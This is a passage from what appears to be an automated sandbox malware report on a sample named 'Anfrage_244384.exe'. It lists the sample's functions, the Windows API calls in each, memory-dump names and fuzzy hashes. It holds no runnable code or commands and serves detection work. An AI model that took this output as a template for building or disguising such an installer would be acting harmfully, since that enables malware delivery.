Instruction Fuzzy Hash: 39F0AF72A00111ABDB20BFA09B8EABE72B89B40354F24003BF241B71C0D9FD8D029769

Function 00401A1E Relevance: 3.0, APIs: 2, Instructions: 30stringCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A31
lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A44

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: EnvironmentExpandStringslstrcmp
String ID:
API String ID: 1938659011-0
Opcode ID: b5552f2be234a290874f3c0f94242e0d4c4f10651bf1eb4e94e930b3861cabfe
Instruction ID: 71b0070a6829c7cde886a334cb24b035409c21bf23b10b7f61276c16d8a13fe4
Opcode Fuzzy Hash: b5552f2be234a290874f3c0f94242e0d4c4f10651bf1eb4e94e930b3861cabfe
Instruction Fuzzy Hash: C4F08231705201EBCF20DF659E45A9B7FA8EF91354B10403BE145F6190D6788542DA6C

Function 00401E25 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401E43
EnableWindow.USER32(00000000,00000000), ref: 00401E4E

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: cac30e9f311eb4ad2c25aa1c1ee820d5a828409d143bedf3ac931335164bf815
Instruction ID: 766ce69f8d9f29119b9d93d8ed06da5c6cb9de514c9912c491c81b05177acf23
Opcode Fuzzy Hash: cac30e9f311eb4ad2c25aa1c1ee820d5a828409d143bedf3ac931335164bf815
Instruction Fuzzy Hash: 40E01272B04211AFE714EBB5EA895AE7BB4EF40325B20403BE441F21D1DA7949419B5D

Function 0040615C Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,0040320D,00000009), ref: 0040616E
GetProcAddress.KERNEL32(00000000,?), ref: 00406189

Part of subcall function 004060EE: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406105
Part of subcall function 004060EE: wsprintfA.USER32 ref: 0040613E
Part of subcall function 004060EE: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406152

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 37fdef8a9e74f9e01c5d9cba486b55d61192e0831b538c4ba44b35669f5e3aa1
Instruction ID: fe74a3adc9e6e91e185966662b1f988274032fa32bcfbda24cecdfcd84f5f1f8
Opcode Fuzzy Hash: 37fdef8a9e74f9e01c5d9cba486b55d61192e0831b538c4ba44b35669f5e3aa1
Instruction Fuzzy Hash: 94E08632604211ABD6115A749E0493B63A89F84740302443EF556F6181DB38DC3296AD

Function 00405A36 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000003,00402D3A,C:\Users\user\Desktop\Anfrage_244384.exe,80000000,00000003), ref: 00405A3A
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405A5C

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: eb7c70162aaa2fbb41597db753891574ee1d02ab6b0bad872be1f899585ac646
Instruction ID: c63a2702068139c3e9e84e7d8e4b9ff8807d85cc1eea12f828f76e542108ca00
Opcode Fuzzy Hash: eb7c70162aaa2fbb41597db753891574ee1d02ab6b0bad872be1f899585ac646
Instruction Fuzzy Hash: 4ED09E31254301EFEF098F20DE16F2EBAA2EB84B01F11552CBA82950E0DA7158199B15

Function 0040551F Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNELBASE(?,00000000,00403196,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403393), ref: 00405525
GetLastError.KERNEL32 ref: 00405533

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 6906a218f2e8c60edb1d49339bec002b269bb684b810150c6462e9a7ab2278e9
Instruction ID: 6753ad635049e665ee29f65e98c6a641fb529068fc3dcc6b05b24214ffa30412
Opcode Fuzzy Hash: 6906a218f2e8c60edb1d49339bec002b269bb684b810150c6462e9a7ab2278e9
Instruction Fuzzy Hash: 2FC04C70255901EBDB515F20AF087177965AB60781F564839618AE10E4DA748415D92D

Function 004025D7 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: wsprintf
String ID:
API String ID: 2111968516-0
Opcode ID: 49b3759869228e343b488f69512dd5783725357fe23cd51fc775af813734beff
Instruction ID: 05ba47fdecc3ea63c4ababd7ecb476dc6fb20db578e5a9eb58a554c529b3a997
Opcode Fuzzy Hash: 49b3759869228e343b488f69512dd5783725357fe23cd51fc775af813734beff
Instruction Fuzzy Hash: 6021C970D0429AFADF218B9885486AEBF749F11314F1445BFE894B63D1C1BE8A81CF19

Function 0040166A Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON

Download Yara Rule

APIs

MoveFileA.KERNEL32(00000000,00000000), ref: 00401685

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 959bd50837eb92415fecec8519fb41a0f39fb6080f95b2b2d2609fca4733927e
Instruction ID: af85bf01cb9a50de78f0d69bccb7876c1bca0e6a55c196669191a5ce7f6391a1
Opcode Fuzzy Hash: 959bd50837eb92415fecec8519fb41a0f39fb6080f95b2b2d2609fca4733927e
Instruction Fuzzy Hash: E6F09031B08225A3DB20B7B64F0DD5F11649B82368B34027BF111B21D1DABD860296AE

Function 00402695 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004026B3

Part of subcall function 00405D21: wsprintfA.USER32 ref: 00405D2E

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 4841840ad3e59c26d6a825385cdbce8c8f4545ec6429af0b04c71902af0b9ea9
Instruction ID: 70d0227debc7a37a578d7891b0457e087c522133a583d4ed7425beec3b860107
Opcode Fuzzy Hash: 4841840ad3e59c26d6a825385cdbce8c8f4545ec6429af0b04c71902af0b9ea9
Instruction Fuzzy Hash: 40E012B1B04119ABD701EB95AE898BF7BA9DF50329F10843BF141F10D1C67E49429B2D

Function 004022F2 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 0040232B

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 0c403ca9e670ca7d91bfe0ece00723349c72c8e04d61ed265d5033cb5576c277
Instruction ID: 835d7e161f894c1f3c63ad3b4a4a0fef325150ad5848be7be1b76146568c1c9e
Opcode Fuzzy Hash: 0c403ca9e670ca7d91bfe0ece00723349c72c8e04d61ed265d5033cb5576c277
Instruction Fuzzy Hash: 9EE04F31B001246BD7307AB10F8E97F10999BC4304B39153EBA01B62C6EDBC4C414AB9

Function 0040171F Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401733

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: b870edbfbee029a9ad95b8ba954cad8e8ca6e667ef8ccb932940172cb277afcb
Instruction ID: ffb32fe50564557a3c315a30f6fc07dc6475dfcf7bd80787db6a7ea0a2c14a15
Opcode Fuzzy Hash: b870edbfbee029a9ad95b8ba954cad8e8ca6e667ef8ccb932940172cb277afcb
Instruction Fuzzy Hash: B2E020B1304111ABD710DF54DE48EAB3B58DF10368F30413AF151F60C0D5FA5945A738

Function 00402BD8 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(00000000,000005B0,00000000,00000022,00000000,?,?), ref: 00402C00

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 72d4a8390eeea65c1ae52196c94098a904bafdf16ab8cb809bd630a83faab224
Instruction ID: 602783241e3b5571dba8f65d987ce24de14800ae8f8c1c2312d958f7963b7942
Opcode Fuzzy Hash: 72d4a8390eeea65c1ae52196c94098a904bafdf16ab8cb809bd630a83faab224
Instruction Fuzzy Hash: 4EE04F76250108BADB00EFA4EE46F9537ECE744700F008435B608E61A1C674E5408B68

Function 00405ADD Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040310E,00000000,00415420,000000FF,00415420,000000FF,000000FF,00000004,00000000), ref: 00405AF1

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 84c91d76a83be332908af776156b545b11287c12e2770689e8b3db02ea887268
Instruction ID: 1ed90d873f298f356d36a2c1dae4bb172ade26fd4588ec9ef5a2339dc9f33d8e
Opcode Fuzzy Hash: 84c91d76a83be332908af776156b545b11287c12e2770689e8b3db02ea887268
Instruction Fuzzy Hash: 11E0EC3221425AABDF609E65DC04AEB7B7CFB05360F014436F925E6190D631F821DFA5

Function 00405AAE Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403158,00000000,00000000,00402F82,000000FF,00000004,00000000,00000000,00000000), ref: 00405AC2

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 7a5894fcc52b5b75c83558307916cd1b307e449aca39369e2409f4e78c5f9a6a
Instruction ID: e0af876c1f8b3f6a8543b45de02fe6ba5ae560271bae9c5b6a9092efc5817470
Opcode Fuzzy Hash: 7a5894fcc52b5b75c83558307916cd1b307e449aca39369e2409f4e78c5f9a6a
Instruction Fuzzy Hash: FCE0463220029AABCF10AE509C40AAB3B6CEB00261F104832B916E3080E2B0E8209FA4

Function 1000270B Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002729

Memory Dump Source

Source File: 00000000.00000002.2608477836.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2608425248.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2608498578.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2608545228.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_Anfrage_244384.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
Instruction ID: 4f82052a8ee677216feeb46ba648c84afb962adc58c95b92ee0d34447feb5494
Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
Instruction Fuzzy Hash: B5F09BF19092A0DEF360DF688CC4B063FE4E3983D5B03892AE358F6269EB7441448B19

Function 0040159D Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 2311168178740a320a7838dbc888e64bfba08100527ad66c07f3f89ca227bd51
Instruction ID: e24d852e2ad3a8f86fdc323a2a6250be89694c15614e2f118570afc755bb50f4
Opcode Fuzzy Hash: 2311168178740a320a7838dbc888e64bfba08100527ad66c07f3f89ca227bd51
Instruction Fuzzy Hash: 4DD05B72704115D7CB10EBE5EF0869D77B09B50364F304137D251F31D0D6BACA559729

Function 0040315B Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EC1,?), ref: 00403169

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D

Function 00403FDD Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000028,?,00000001,00403E0E), ref: 00403FEB

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 2bf10b83fa6dd9bc40a18547b02fbce2a65827e50004d0a7ab2884d4d9fdcea2
Instruction ID: 0adc9c0e194aa77c868d6ef978719a9753de7db756a7c543b14a3307e76eee0a
Opcode Fuzzy Hash: 2bf10b83fa6dd9bc40a18547b02fbce2a65827e50004d0a7ab2884d4d9fdcea2
Instruction Fuzzy Hash: B2B09235280A00AAEA215B00DE09F467A62A764701F408038B240250B1CAB200A6DB18

Non-executed Functions

Function 0040511A Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 00405179
GetDlgItem.USER32(?,000003EE), ref: 00405188
GetClientRect.USER32(?,?), ref: 004051C5
GetSystemMetrics.USER32(00000002), ref: 004051CC
SendMessageA.USER32(?,0000101B,00000000,?), ref: 004051ED
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004051FE
SendMessageA.USER32(?,00001001,00000000,?), ref: 00405211
SendMessageA.USER32(?,00001026,00000000,?), ref: 0040521F
SendMessageA.USER32(?,00001024,00000000,?), ref: 00405232
ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405254
ShowWindow.USER32(?,00000008), ref: 00405268
GetDlgItem.USER32(?,000003EC), ref: 00405289
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405299
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004052B2
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004052BE
GetDlgItem.USER32(?,000003F8), ref: 00405197

Part of subcall function 00403FDD: SendMessageA.USER32(00000028,?,00000001,00403E0E), ref: 00403FEB

GetDlgItem.USER32(?,000003EC), ref: 004052DA
CreateThread.KERNEL32(00000000,00000000,Function_000050AE,00000000), ref: 004052E8
CloseHandle.KERNEL32(00000000), ref: 004052EF
ShowWindow.USER32(00000000), ref: 00405312
ShowWindow.USER32(?,00000008), ref: 00405319
